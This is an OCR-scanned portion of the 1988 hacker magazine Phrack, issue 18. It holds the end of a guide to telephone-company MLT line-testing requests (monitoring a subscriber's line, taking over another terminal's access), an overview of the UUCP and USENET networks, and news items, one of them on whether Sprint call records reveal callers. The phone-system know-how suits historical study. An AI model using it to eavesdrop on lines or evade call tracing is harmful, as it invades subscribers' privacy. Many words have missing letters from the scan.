not connected to the loop testing system. This may occur in small offices 
where the frame attendant doesn’t work for the entire day. You can also use 
this request when an MDF trunk has to be tested and repaired. The MDF entry 
must be a five character entry consisting of the wire center identifier and 
the trunk number. 


Mdf: Access a main distributing frame (MDF) 


MDF connects the mlt testing equipment to an MDF trunk. Before you can enter 
any requests, you must have the frame attendant connect the MDF trunk to the 
subscriber’s line. Remember that MLT automatically accesses a no-test trunk 
unless you specifically request an MDF trunk. An MDF trunk goes directly from 
t 

fe) 

t 

al 


he loop testing system to the main distributing frame. Bypassing the central 
ffice switch. Using an MDF trunk allows you to test loops that are connect 

Oo co equipment that is not MLT-testable. Also, you can sectionalize a fault 
n or out of the co by testing "in" or "out" using MDF. 


MDF (gr): Access a trunk from a certain mdf trunk group 

MDF (gr) lets you choose the MDF trunk group from which MLT will choose an MDF 
trunk. Use the MDF(gr) request when the NPA-NXX that you are using has more 
than one frame associated with it and you can’t enter cable and pair numbers. 
For example, to request MDF trunk group a, you should enter MDFA in the req 
field. To find out which trunk groups are available for your NPA-NXX you can 
either enter an mdf or an info request. Remember that you still have to call 
the frame attendant to have the trunk and line connected and also disconnect 
when you are finished. 


Mdfin: Test the inside part of a line 


Mdfin starts a series of tests that do an extensive analysis of the inside 
line. This includes line circuit and dial tone tests. The mdfin request uses 
a special line that runs from the MLT testing equipment to the MDF. You must 
ask the frame attendant to connect this line to the subscriber’s line. Then 
you must enter the telephone number of this special line on the test mask 
along with mdfin and the subscriber’s number. For more information see the 
mdfio module in the MLT-2 user guide. 


Mdfout: Test the outside part of a line 


Mdfout starts a series of tests that do an extensive analysis of the outside 
line. This includes the DC and AC tests. The mdfout request uses a special 
line that runs from the mlt testing equipment to the MDF. You must ask the 
frame attendant to connect this line to the subscriber’s line. Then you must 
nter the telephone number of this special line on the test mask along with 
mdfin and the subscriber’s number. 


Mon: Monitor a subscriber’s line 
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Mon lets you monitor a subscriber’s line. Sometimes you are a better judge of 
whether there is noise, speech, or a recording on a line than MLT is. If you 
want to listen to a line to determine if one of these conditions does exist, 
use the mon request. You can also be automatically placed in the monitor mode 
by MLT in some cases. You will be put in monitor mode if you request ring, 
talk or psr but MLT thinks the line is busy, or if you must talk to the 
subscriber to run a rev, dial, or tt. A callback number is required. You can 
request quick, look, or full while in monitor mode. 


Psr: Release a permanent signal 


Psr attempts to release a permanent signal in a step-by-step central office. 
A permanent signal is a steady dial tone on a line. A frequent cause is a 
receiver that is off-hook. Psr lets you remove the permanent signal so that 
you can monitor for room noise. If when you monitor the line you still hear 
steady dial tone, you should suspect permanent signal on the line. Psr 
requires a callback path between your callback line and the subscriber’s line. 
You should already have the callback path established before you enter a psr 
request. 


Qin: Run a quick series in toward the co 


Qin starts a series of tests that make a "quick" check of the loop toward the 
central office. It includes the same tests as quick. It can also identify a 
co line circuit if one is present and will report a line circuit if the DC 
resistances look like one is present. An MDF access is required for a qin 
request. You can use gin to test special switching machines. For example, if 
the circuit has 2 loops connected at the frame, gin lets you look at the 2nd 
loop (both full & loop only test toward one loop). 


Rev: Identify touch-tone polarity reversals 


Rev helps you identify a touch-tone polarity reversal. On a good line, the 
battery is connected to the ring wire and the ground is on the tip wire. 

These wires must be connected to specific terminals on the telephone. If they 
are reversed, the subscriber will be able to receive calls but will not be 
able to dial out. If the line is reversed, you won’t be able to hear th 

tones before you enter a rev request. Rev only reserves the line temporarily. 
A callback path should be established before you make a rev request. 


Rin: Ring a subscriber’s special services line 


Rin lets you ring a telephone on a special services line. A callback is 
required. If one doesn’t exist, ring in sets one up for you. To answer the 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
the line is busy, the call in progress will be interrupted. Use rin to 
contact the subscriber or a technician at the subscriber’s home. MDF access 
is required to request rin. 


Ring(#): Ring a specific party on a multi-party line 


Ring(#) lets you choose the telephone that you want to ring on a multiparty 
line. A multiparty line is one on which more than one subscriber is connected 
to the same pair of wires. Normally MLT checks the line records of the 
telephone number you enter using the ring request, and automatically rings the 
correct party. When the line records indicate 2, 4, or 8 party, use the 
ring(#) request and specify the party number in place of the "#." If you 
request ringl, MLT rings the party connected to the ring side. If you request 
ring2, MLT rings the party connected on the tip side. 


Ring: Ring a subscriber’s line 


Ring lets you ring a telephone on a single party line. A callback path is 
required but if one doesn’t exist, ring sets one up for you. To answer your 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
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the line is busy or cannot be rung, you will be placed in monitor mode to 
listen for noise or speech. Use ring to contact the subscriber or a repair 
person at the subscriber’s home. 


Ringer: Check ringer configuration on a line 


Ringer counts the number of ringers on each part of the loop (tip-ring, 
tip-ground, and ring-ground). The results tell you the number of telephones 
found by MLT. If there is a problem, the summary explains the problem. If 
you are testing a party line, some of the ringers found may belong to the 
other party. 


Rin: Ring a subscriber’s special services line 


Rin lets you ring a telephone on a special services line. A callback is 
required. If one doesn’t exist, ring-in sets one up for you. To answer the 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
the line is busy the call in progress will be interrupted. Listen for noise 
of speech. Use rin to contact the subscriber or a technician at the 
subscriber’s home. MDS is required to request rin. 


Soak: Identify swinging resistance condition 


Soak identifies unstable ground faults (swinging resistance) on a line. 
Voltage is applied to the line and a series of DC resistance measurements are 
made to s th ffect of that voltage. If the resistance values are all low, 
the fault is probably stable. If even one value is 20% larger than the 
original measurement, the fault may be unstable (swinging). A repair person 
who is dispatched may have trouble locating a swinging fault. Use soak when 
you find a 10-1000 kohm ground on a q test (full & loop include the soak 
test), or just prior to dispatch to double-check a line’s condition. 


Ssa: Special services access 
The ssa request is used to access non-locally switched customer telephone 
lines. Accessing these lines is a special case of a no-test trunk access. 
However, if they go through a digital loop carrier such as SLC Series 5, and 
there is special equipment available in the co, then you can test them with a 
no-test trunk special se rvices access. This means you don’t have to call the 
trunk. The request can only be run from the stv mask. 


Stv: Special services trouble verification request 


The stv request changes you from a tv mask to an stv mask. Stv is used when 
you need to test special services circuits (non-locally switched lines) served 
by digital loop carrier systems such as SLC Series 5. Switching to the stv 
mask will not affect any information you left in the tv mask -- your status 
lines will remain the same; however, the middle section of the mask will be 
changed. Any request done from a tv mask can also be done from an stv mask, 
but not vice versa. The stv request can only be run from a tv mask. 


ake: Take control of a long-term access 


Take is used when you want to transfer a long-term access from someone else’s 
terminal to your terminal. To take control of a no-test access, enter th 
telephone number that you want to transfer in the tn field. To transfer an 
MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF 
number in the space to the right of the regular tn field of the tv mask. 
Finally, enter take in the req field. If the previous holder had a callback 
established, it would not be remover. If necessary, you must remove the 
callback using xcb and request a new callback to your telephone. 


Talk: Talk over the subscriber’s line 


Talk lets you talk to either a subscriber or a repair person on a subscriber’s 


line. alk does not ring the line so there must be someone waiting to talk to 
you on the other end of the line. A callback path is required for the talk 
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request but if one does not already exist, talk will set one up for you if you 
have a callback number entered. If the line is already accessed before th 
talk request, MLT enters a "t" and the last 2 digits of the callback number 
under the callback heading and updates the time since access. You can request 
quick, loop, or full while in talk mode. 


alkin: Talk over the subscriber’s special services line 


Talkin lets you talk to a subscriber or a repair person on a special services 
line. Talkin does not ring the line so there must be someone waiting to talk 
to you on the other end of the line. A callback path is required for the 
talkin request but if one does not already exist, talkin sets one up for you 
if you have a callback number entered. If the line is already accessed before 
the talkin request, MLT enters a "t" and the last 2 digits of the callback 
number under the callback heading and updates the time since access. You must 


have an MDF access to request talkin. 


Tonet+: Use loud tone to help identify a pair 

Tone+ puts a high amplitude tone on a line. It is used on pairs that are very 
long. The extra amplitude helps the repair-person hear the tone over long 
distances. Tone is used to help a repair person to locate the correct pair in 
a cable with many pairs of wires in it. Use tonet+ when a repair person 
requests a tone on a very long pair. If you have a callback on the line, it 
will be placed in monitor mode. If the status line gets brighter & you get a 


changed state message, it means 1) The repair person found the pr & wants to 
talk to you or 2) The subscriber has gone off-hook. 


Tone: Use tone to help craft identify a pair 


Tone puts a metallic tone on a line. There may be many pairs in a single 
cable, making it difficult for a repair person to locate a specific line. The 
tone makes this job easier. Before MLT places a tone on a line it does a 
test. The results tell you if there is a fault on the line. If there is a 
callback on the line when you request a tone, it will be placed in monitor 
mode. If the status line gets brighter and you get a changed state message, 
it means either 1) The repair person found the pr & wants to talk to you or 2) 


The subscriber has gone off-hook. 


Toneca: Use tone to help identify a cable 


Toneca puts a longitudinal tone on a line. This tone helps the repair person 
find the cable binder group that the pair is in. The repair person finds the 
correct cable by listening for the tone. Because the tone can be heard on 


pairs other than the one you put it on, when tone or tone+ are inappropriate. 
If the repair person does not have time to find the cable on the first try, 
you can repeat the request. Before placing the tone on the line, MLT does a 
pretest and tells you if there is a fault on the line. 


Tonein: Use tone to help a technician identify a special services pair 


Tonein puts a metallic tone on a special services line. It may be difficult 
for a technician to locate a specific line. The tone makes this job easier. 
Before MLT places a tone on a line it does a pretest. An MDF access is 
required in order to request a tonein. If a callback is on the line when you 
request tonein, it is placed in monitor mode. If the status line gets 
brighter and you get a changed state message, it means either 1) The repair 
person found the pr & wants to talk to you or, 2) The subscriber has gone 
off—-hook. 


Tt: Test the subscriber’s touch-tone pad 


[Tt checks a subscriber’s touch-tone pad. It analyzes the tones produced when 
the subscriber presses the button before you make a tt request. You in the 
sequence 1 through 0. You must instruct the subscriber to press the buttons 
after hearing dial tone. Ml1t will signal you over your headset with two beeps 
if the pad is good or one or no beeps if it is bad. A callback path should be 
established before you make a tt request. You must use a no-test trunk access 
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to request it. You can use the ring request to contact the subscriber and set 
up a callback. 


Tv: Trouble verification request 

The tv request changes you from an stv mask to a tv mask. Tv is used when you 
need to do interactive testing of locally switched telephone lines, or tests 
using an MDF trunk. Switching to the tv mask will not affect any information 
you left in the stv mask -- your status lines will remain the same; however, 
the middle section of the mask will be changed. Any request done from a tv 
mask can also be done from an stv mask, but not vice versa. The request can 


only be run from a stv mask. 


Ver##: Get definition and example of a ver code 


Ver gives you a description of the ver code that you type in place of the 
##. For example, a ver22 request will give you a definition of verification 
code number 22 and an example of a typical set of test results that might 
accompany a ver code of 22. Use this request whenever you can’t remember what 
a certain ver code means. MLT stores your tv mask when you request ver cod 
information. 


Ver: Test: th ntire telephone lin 


Ver starts a series of tests that do an extensive analysis of th ntire lin 
This includes both the inside and outside portions. Many individual tests are 
run but only the ver code and summary messages are displayed. Outside, MLT 
checks for AC and DC faults. Inside, it checks the line circuit and dial 
tone. 


Thanks to AT&T and the Bell Operating Companies. 
Control C and The Tribunal of Knowledge 
If you have any questions or comments contact: 
Control C 
Jack Death 
Prime Suspect 
The Prophet 
The Urvile 


Or any other member of the TOK. 


9.txt Wed Apr 26 09:43:37 2017 1 


==Phrack Inc.== 
Volume Two, Issue 18, Phile #9 of 11 


The Tribunal of Knowledge presents... 


A Few Things About Networks 


Brought to you by Prime Suspect (TOK) 


June 1, 1988 


Seems like if you’re into hacking you sometime or another run into using 
networks, whether it be Telenet, Tymnet, or one of th Wide Area Networks. 
One popular Network that hackers have used for some time is Arpanet. Arpanet 
has been around for quite a long time. There are changes made to it almost 
daily and the uses of it are much more than just logging into other systems. 
Many college students find themselves getting acquainted with Bitnet these 
days. Bitnet is SO new compared to other networks that it’s got a lot of 
potential left. There is much more to it then just mail and file transfers. 
There ar interactive uses such as the RELAY for real-time discussion with 
others (equivalent to a CB mode) and another popular use is the network 
information center to receive technical files about networking. There are 
many many mail addresses that are used for database searching, and subscribing 
to electronic magazines. You will find these sam uses on other Wide Area 
Networks also. I will give you 3 related network areas. These thr areas 
include: The AT&T company networks, UUCP, and Usenet cooperative networks. 
Please note that some of the information I gathered for this file dated back 
to 1986. But I tried to keep it as current as possible. 


AT&T (Company Network) 


AT&T has some internal networks, most of which use internally developed 
transport mechanisms. Their most widely used networks are UUCP and USENET, 
which are not limited to that corporation and which are discussed later. All 
internal AT&T networks support UUCP-style hil!h2!h!u source routing syntax and 
thus appear to the user to be UUCP. Within AT&T, UUCP links are typically 
over 1,200-bps dial-up telephone lines or Datakit (see below). 

Among AT&T’s other networks, CORNET is an internal analog phone network 
used by UUCP and modems as an alternative to Direct Distance Dialing (DDD). 
Datakit is a circuit-switched digital net and is similar to X.25 in some 
ways. Most of Bell Laboratories is trunked together on Datakit. On top of DK 
transport service, people run UUCP for mail and dkcu for remote login. In 
addition to host-to-host connections. Datakit supports RS232 connections for 
terminals, printers, and hosts. ISN is the version of Datakit supported by 
AT&T Information Systems. Bell Laboratories in Holmdel, New Jersey, uses ISN 
for internal data communication. BLICN (Bell Labs’ Interlocation Computing 
Network) is an IBM mainframe RJE network dating from the early 1970s when 
Programmer’s Workbench (PWB) was a common version of the UNIX operating 
system. Many UNIX machines with PWB-style RJE links use BLICN to queue mail 
and netnews for other UNIX machines. A major USENET host uses this mechanism 
to feed news to about 80 neighbor hosts. BLICN covers Bell Laboratories 
installations in New Jersey, Columbus, Ohio, and Chicago, and links most 
computer center machines. BLN (Bell Labs Network) is an NSC Hyperchannel at 
Indian Hill, Chicago. 
AT&T Internet is a TCP/IP internet. It is not a major AT&T network, though 
some of the best-known machines are on it. There are many ethernets connected 
by TCP/IP over Datakit. This internet may soon be connected to the ARPA 
Internet. 

ACCUNET is AT&T’s commercial X.25 network. AT&T MAIL is a commercial 
service that is heavily used within AT&T Information Systems for corporate 
internal mail. 
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UUCP (Cooperative Network) 


The name "UUCP," for Unix to Unix CoPy, originally applied to a transport 
service used over dial-ups between adjacent systems. File transfer and remote 
command execution were the original intent and main use of UUCP. There was an 
assumption that any pair of communicating machines had direct dial-up links, 
that is, that no relaying was done through intermediate machines. By the end 
of 1978, there were 82 hosts within Bell Laboratories connected by UUCP. 
Though remote command execution and file transfer were heavily used, there is 
no mention of mail in the standard reference. There was another similar 
network of "operational" hosts with UUCP links that were apparently outside 
Bell Laboratories, but still within the Bell System. The two networks 
intersected at one Bell Laboratory machine. 

Both of these early networks differed from the current UUCP network in 
assuming direct connections between communicating hosts and in not having 
mail service. The UUCP mail network proper developed from the early networks 
and spread as the UUCP programs were distributed as part of the Unix system. 

Remote command execution can be made to work over successive links by 
arranging for each job in the chain to submit the next one. There are several 
programs that do this: Unfortunately, they are all incompatible. There is no 
facility at the transport level for routing beyond adjacent systems or for 
error acknowledgement. All routing and end-to-end reliability support is done 
explicitly by application protocols implemented using the remote command 
execution facility. There has never been any remote login facility associated 
with UUCP, though the cu and tip programs are sometimes used over the sam 
telephone links. 

The UUCP mail network connects a very diverse set of machines and users. 
Most of the host machines run the UNIX operating system. Mail is the only 


service provided throughout the network. In addition to the usual uses of 
mail, much traffic is generated as responses to USENET news. The same 
underlying UUCP transport mechanisms are also used to support much 
of USENET. 

The UUCP mail network has many problems with routing (it is one of the few 


major networks that uses source routing) and with its scale. Nonetheless, it 
is extremely popular and still growing rapidly. This is attributable to three 


circumstances: ease of connection, low cost, and its close relationship with 
the USENET news network. 
Mailing lists similar to those long current on the ARPANET have recently 


increased in popularity on the UUCP mail network. These permit a feature that 
USENET newsgroups cannot readily supply: a limitation on access on a 
per-person basis. Also, for low-traffic discussions mailing lists are more 
economical, since traffic can be directed to individuals according to their 
specific interests. 
There is no central administration. To connect to the network, one need 
only find one machine that will agr to be a neighbor. For people at other 
hosts to be able to find your host, however, it is good to be registered in 
the UUCP map, which is kept by the group of volunteers known as the UUCP 
Project. The map is posted monthly in the USENET newsgroup "comp.mail.maps". 
There is a directory of personal addresses on the UUCP network, although this 
is a commercial venture unrelated to the UUCP Project. 
Each host pays for it’s own links; some hosts encourage others to connect 
to them in order to shorten mail delivery paths. 
There is no clear distinction between transport and network layers in UUCP, 
and there is nothing resembling an Internet Protocol. The details of the 
transport protocol are undocumented (apparently not actually proprietary to 
AT&T, contrary to rumor, though the source code that implements the protocol 
and is distributed with UNIX is AT&T’s trade secret). 
Mail is transferred by submitting a mail command over a direct connection 
by the UUCP remote command execution mechanism. The arguments of the mail 
command indicate whether the mail is to be delivered locally on that system 
or resubmitted to another system. In the early days, it was necessary to 
guess the route to a given host and hope. The only method of acknowledgment 
was to ask the addressee to reply. Now there is a program (pathalias) that 
can compute reasonable routes from the UUCP map, and there is software that 
can automatically look up those routes for users. 
The UUCP mail network is currently supported in North America mostly by 
dial-up telephone links. In Europe there is a closely associated network 
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called EUnet, and in Japan there is JUNET. 

The most common dial-up link speed on the UUCP mail network is 1,200 bps 
though there are still a few 300-bps links, and 2,400 bps is becoming 
more popular. Actually, now I believe that 1200-bps is still very common, 
but 2400 may be just as common, and 9600-bps is much more common than ever 
thought it would be in 1986. There are also many sites that use 19,200-bps 
for using UUCP. When systems are very close, they are sometimes linked by 
dedicated lines, often running at 9,600 bps. Some UUCP links are run over 
local-area networks such as ethernets, sometimes on top of TCP/IP (though more 
appropriate protocols than UUCP are usually used over such transport media, 
when UUCP is used it’s usual point-to-point error correction code is bypassed 
to take advantage of the reliability of the underlying network and to improve 
bandwidth). Some such links even exist on long-haul packet networks. 

The widespread use of more sophisticated mail relay programs (such as 
sendmail and MMDF) has increased reliability. Still, there are many hosts 
with none of these new facilities, andth sheer size of the network makes 
it unwieldly. 

The UUCP mail network has traditionally used source code routing with a 
syntax like hosta!hostb!hostc!host!user. The UUCP map and pathalias have made 
this bearable, but it is still a nuisance. An effort is underway to alleviate 
the routing problems by implementing naming in the style of ARPA Internet 
domains. This might also allow integration of the UUCP name space into 
the ARPA Internet domain name space. In fact there is now an ATT.COM domain 
in which most hosts are only on UUCP or CSNET. Most UUCP hosts are not yet in 
any Internet domain, however. This domain effort is also handled by the UUCP 
Project and appears to be proceeding at a methodical but persistent pace. 

The hardware used in the UUCP mail network ranges from small personal 
computers through workstations to minicomputers, mainframes and  super-— 
computers. The network extends throughout most of North America and parts of 
Asia (Korea and Israel). Including hosts on the related networks JUNET (in 
Japan) and EUnet (in Europe), there are at least 7,000 hosts on the network; 
possibly 10,000 or more. (EUnet and JUNET hosts are listed in the UUCP maps.) 
The UUCP Project addresses are: 


uucp-query@cbatt.ATT.COM 
cbhatt !uucp-query 
uucp-query@cbatt .UUCP 


Much information about UUCP is published in USENET newsgroups. 


USENET (Cooperative Network) 


USENET began in 1980 as a medium of communication between users of two 
machines, one at the University of North Carolina, the other at Duke 
University. It has since grown exponentially to its current size of more than 
2000 machines. In the process, the software has been rewritten several times, 
and the transport mechanisms now used to support it include not only the 
original UUCP links, but also X.25, ACSNET, and others. 

USENET combines the idea of mailing lists as long used on the ARPANET with 
bulletin-board service such as has existed for many years on TOPS-20 and other 
systems, adding a freedom of subject matter that could never exist on the 
ARPANET, and reaching a more varied constituency. While chaotic and inane 
ramblings abound, the network is quite popular. 

The USENET news network is a distributed computer conferencing system 
bearing some similarities to commercial conferencing systems like CompuServe, 
though USENET is much more distributed. Users pursue both technical and 
social ends on USENET. Exchanges are submitted to newsgroups on various 
topics, ranging from gardening to astronomy. 

The name "USENET" comes from the USENIX Association. [The Professional and 
Technical UNIX User’s Group. The name UNIX is a pun on Multics, which is the 
name of a major predecessor operating system. (The pun indicates that, in 
areas where Multics tries to do many things, UNIX tries to do one thing well.) 
USENET has no central administration, though there are newsgroups to which 
introductory and other information about the network is posted monthly. 
USENET is currently defined as the set of hosts receiving the newsgroup 
news.announce. There are about a dozen hosts that constitute the backbone of 
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the network, keeping transit times low by doing frequent transfers among 
themselves and with other hosts that they feed. Since these hosts bear much 
of the burden of the network, their administrators tend to take a strong 

interest in the state of the network. Most newsgroups can be posted to by 


anyone on the network. For others, it is necessary to mail a submission to a 
moderator, who decides whether to post it. Most moderators just filter out 
redundant articles, though some make decisions on other grounds. These 


newsgroup moderators form another group interested in the state of the 
network. Newsgroups are created or deleted according to the decisions made 
after the discussion in the newsgroup "news.groups". 

Each host pays its own telephone bills. The backbone hosts have higher 
bills than most other hosts due to their long-distance links among themselves. 
The unit of communication is the news article. Each article is sent by a 
flooding routing algorithm to all nodes on the network. The transport layer 
is UUCP for most links, although many others are used, including ethernets, 
berknets, and long-haul packet-switched networks; sometimes UUCP is run on top 
of the others, and sometimes UUCP is not used at all. 

The many problems with USENET (e.g. reader overload, old software, slow 
propagation speed, and high and unevenly carried costs of transmission) have 
raised the possibility of using the experience gained in USENET to design a 
new network to replace it. The new network might also involve at least a 
partial replacement for the UUCP mail network. 

One unusual mechanism that has been proposed to support the new network is 
stargate. Commercial television broadcasting techniques leave unused 
bandwidth in the vertical blanking interval between picture frames. Some 
broadcasters are currently using this part of the signal to transmit Teletext 
services. Since many cable-television channels are distributed via 
geo-synchronous satellites, a single input to a satellite uplink facility can 
reach all of North America on an appropriate satellite and channel. A 
satellite uplink company interested in allowing USENET-like articles to be 
broadcast by satellite on a well-known cable-television channel has’ been 
found. Prototypes of hardware and software to encod the articles and other 
hardware to decode them from a cable-television signal have been built and 
tested in the field for more than a year. A new, reasonably price model of 
the decoding box may be available soon. 

This facility would allow most compatible systems within the footprint 
(area of coverage) of the satellite and with access to the appropriate cable- 
television channel to obtain decoding equipment and hook into the network at a 
very reasonable cost. Articles would be submitted for transmission by UUCP 
links to the satellite uplink facility. Most of the technical problems of 
Stargate seem to have been solved. 
More than 90 percent of all USENET articles reach 90 percent of all hosts 
on the network within three days. Though there hav been som famous bugs 
that caused loss of articles, that particular problem has become rare. 

Every USENET host has a name. That host name and the name of the poster 
are used to identify the source of an article. Though those hosts that are on 
both the UUCP mail and USENET news networks usually have the same name on both 
networks, mail addresses have no meaning on USENET: Mail related to USENET 
articles is usually sent via UUCP mail; it cannot be sent over USENET, by 


definition. Though the two networks have always been closely related, ther 
are many more hosts on UUCP than on USENET. In Australia the two networks do 
not even intersect except at one host. 

There are different distributions of newsgroups on USENET. Some go 
verywhere, whereas others are limited to a particular continent, nation, 


state or province, city, organization, or even machine, though the more local 


distributions are not really part of USENET proper. The European network 
EUnet carries some USENET newsgroups and has another set of it’s own. JUNE 
in Japan is similar to EUnet in this regard. 

There are about 2000 USENET hosts in the United States, Canada, Australia, 


and probably in other countries. The hosts on EUnet, SDN, and JUNET 
communicate with USENET hosts: The total number of news hosts including ones 
on those three networks is probably at least 2500. The UUCP map includes 
USENET map information as annotations. A list of legitimate netwide 
newsgroups is posted to several newsgroups monthly. Volunteers keep 
statistics on the use of the various newsgroups (all 250 of them) and on 
frequency of posting by persons and hosts. These are posted to news.newslists 
once amonth, as is the list of newsgroups. Important announcements are 
posted to moderated newsgroups, newS.announce and news.announce.newusers, 
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which are intended to reach all users (the current moderator is Mark Horton, 
chosgd!mark). An address for information on the network is 
seismo!usenet-request. 


News on UUNET —- June 1988 


A year ago, UUNET (Fairfax, VA) was formed to help ease the communication 
load of th beleaguered Usenet network of UNIX users. Usenet connections 
were becoming increasingly costly and difficult to maintain, a situation that 
prompted th Usenix Association to fund the creation of the UUNET 
Communications Service to assist users in accessing Usenet. Now, UUNET has 
becom th "best connected" UNIX computer in the world, and has’ been 


authorized to function as an Arpanet mail gateway. Gateways to other networks 
are expected to be established in the future. 


I guess all use of UUNE is done through the UUCP program found on Unix 
operating systems. Many people ar getting PC versions of the Unix Operating 
system now-a-days, so knowing what’s availabl befor getting hooked into 
a network, if that’s your plan, is advised. There is an advertisement about 


UUNET on Bix in the networks conference somewhere. The message may be old, 
but still useful. 


The cost of using UUNET is: $30/month... and $2/hour. I think the hourly 
charge may only apply if connecting through Tymnet. Not sure. 


Accessible via Tymnet, their 800 number, or a regular local POTS number. 


Connections can definitely be mad up to 9600 baud. 19.2K baud access may 
also exist. I think it does. 


If you’re a UUNET user, and want to receive mail from someone through the 
UUCP network, they would address it just as any other UUCP mail address. 
An example is: ...-uunet! warble! joeuser 


This file has been brought to you by Prime Suspect and Tribunal of Knowledge 
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Welcome to yet another issue of Phrack World News. We have once again 
returned to try and bring you an entertaining, and informative newsletter 
dedicated to the spread of information and knowledge throughout the H/P 
community. 


TOK Re-Formed 


A group called Tribunal Of Knowledge, which has undergone previous 
re-formations has once again re-formed. The person who is currently "in 
charge" of the group says that he had permission from High Evolutionary, the 
group’s founder, to re-form the organization. Although the group hasn’t 
publicly announced their existence or written any files, we should be hearing 
from them in the near future. 


The Current Members of TOK Include - 


Control C 

Prime Suspect 
Jack Death 

The UrVile 

The Prophet 
Psychic Warlord 


Information Provided By Control C, and Prime Suspect. 


Phrack Inc. Support Boards 


Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts 
on the more popular boards around. These sponsor accounts are set up, so that 
the users may get in touch with the Phrack Magazine staff if they would like 
to contribute an article, or any other information to our publication. Please 
take note of the boards on which Phrack Inc. accounts are set up. Thank you. 


The Current List of Phrack Inc. Sponsor Boards Includes - 


P-80 Systems - 304/744-2253 
OSUNY —- 914/725-4060 
The Central Office —- 914/234-3260 
Digital Logic’s DS - 305/395-6906 
The Forgotten Realm — 618/943-2399 * 


* — Phrack Headquarters 


SummerCon ’88 Preliminary Planning 
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Planning for SummerCon ’88 is underway. So far, we have decided on four 
tentative locations: New York City, Saint Louis, Atlanta, or Florida. Since 
this is only tentative, no dates have been set or reservations made for a 
conference. 


If you have any comments, suggestions, etc, please let us know. If you are 
planning to attend SummerCon ’88, please let us know as well. Thank you. 


Information Provided By The Forgotten Realm. 


LOD/H Technical Journal 


ex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc., 
so he has not had the time, nor the initiative to release the next issue of 
the LOD/H Technical Journal. On this note, he has tentatively turned the 
Journal over to Phantom Phreaker, who will probably be taking all 
contributions for the Journal. No additional information is available. 


Information Provided By The UrVile and Phantom Phreaker. 


Congress To Restrict 976/900 Dial-A-Porn Services 


Congress is considering proposals to restrict dial-up services in an effort to 
make it difficult for minors to access sexually explicit messages. A 
House-Senate committee is currently negotiating the "dial-a-porn" proposal. 
Lawmakers disagree whether or not the proposal is constitutional and are 
debating the issue of requiring phone companies to offer a service that would 
allow parents, free of charge, to block the 976/900 services. Other proposals 
would require customers to pay in advance or use credit cards to access the 
976/900 services. 


Some companies are currently offering free services that restrict minors from 
accessing sexually explicit messages. AT&T and Department of Justice 
officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone 
companies. The FCC recently brought charges against one of AT&T’s largest 900 
Service customers, and AT&T provided the confidential information necessary in 
the prosecution. AT&T also agreed to suspend or disconnect services of 
companies violating the commission ban by transmitting obscene or indecent 
messages to minors. 


Some Hope Left For Victims Of FGD 


US Sprint’s famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may 
pose no threat to individuals under switches that do not yet offer equal 
access service to alternate long distance carriers. Due to the way Feature 
Group D routes its information, the ten-digit originating number of the caller 
is not provided when the call is placed from a non-equal access area. The 
following was taken from an explanation of US Sprint’s 800 INWATS Service. 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKK 


CALL DETAIL 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KK 


With US Sprint 800 Service, a customer will receive call detail information 
for every call on every invoice. The call detail for each call includes: 


Date of call 
Time of call 
The originating city and state 

The ten-digit number of the caller if the call originates in an 


oO00°0 
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equal access area or the NPA of the caller if the non-equal access 
area. 

o Band into which the call falls 

o Duration of the call in minutes 

o Cost of the call 


This came directly from US Sprint. Do as you choose, but don’t depend on 
this. 


Information Provided by US Sprint. 


Telenet Bolsters Network With Encryption 


elenet Communications Corporation strengthened its public data network 
recently with the introduction of data encryption capability. 


The X.25 Encryption Service provides a type of data security previously 
unavailable on any public data network, according to analysts. For Telenet, 
the purpose of the offering is "to be more competitive; nobody else does 
this," according to Belden Menkus, an independent network security consultant 
based in Middleville, NJ. 


The service is aimed at users transmitting proprietary information between 
host computers, such as insurance or fund-transfer applications. It is priced 
at $200 per month per host computer connection. Both the confidentiality and 
integrity of the data can be protected via encryption. 


The scheme provides end-to-end data encryption, an alternative method whereby 
data is decrypted and recrypted at each node in the network. "This is a 
r 
e 


ecognition that end-to-end encryption is really preferable to link 
nceryption,™" Menkus said. 


he service is available over both dial-up and leased lines, and it supports 
both synchronous and asynchronous traffic at speeds up to 9.6K BPS. 


Telenet has approved one particular data encryption device for use with the 
service, The Cipher X 5000, from Technical Communications Corporation (TCC), a 
Concord, Massachusetts based vendor. TCC "has been around the data encryption 
business for quite a while," Menkus said. 


The Cipher X implements the National Bureau of Standards’ Data Encryption 
Standard (DES). DES is an algorithm manipulated by a secret 56 bit key. 

Computers protected with the device can only be accessed by users with a 

matching key. 


The data encryptor is installed at user sites between the host computer and 
he PAD (Packet Assembler/Disassembler). 


ct 


Installation of the TCC device does not affect the user’s ability to send 
non-encrypted data, according to Telenet. By maintaining a table of network 
a 

e 


ddresses that require encryption, the device decides whether or not to 
ncerypt each transmission. 


Information Provided by Network World. 


11.txt Wed Apr 26 09:43:37 2017 1 


==Phrack Inc.== 


Volume Two, Issue 18, Phile #11 of 11 


PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 
PWN PWN 
PWN >>>>>=-* Phrack World News *-=<<<<< PWN 
PWN Issue XVIII/2 PWN 
PWN PWN 
PWN Created By Knight Lightning PWN 
PWN PWN 
PWN Compiled and Written PWN 
PWN by Epsilon PWN 
PWN PWN 
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN 


It seems that there is yet some things to be covered. In addendum, we will be 
featuring, as a part of PWN, a special section where up-and-coming H/P 
Bulletin Boards can be advertised. This will let everyone know where the 
board scene stands. If you have a board that you feel has potential, but 
doesn’t have good users, let us know. Thanks. 


Doctor Cypher Busted? 


Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital 
Logic’s Data Service, The Forgotten Realm, P-80 Systems, and others, is 

believed to have had his modem confiscated by "Telephone Company Security," 
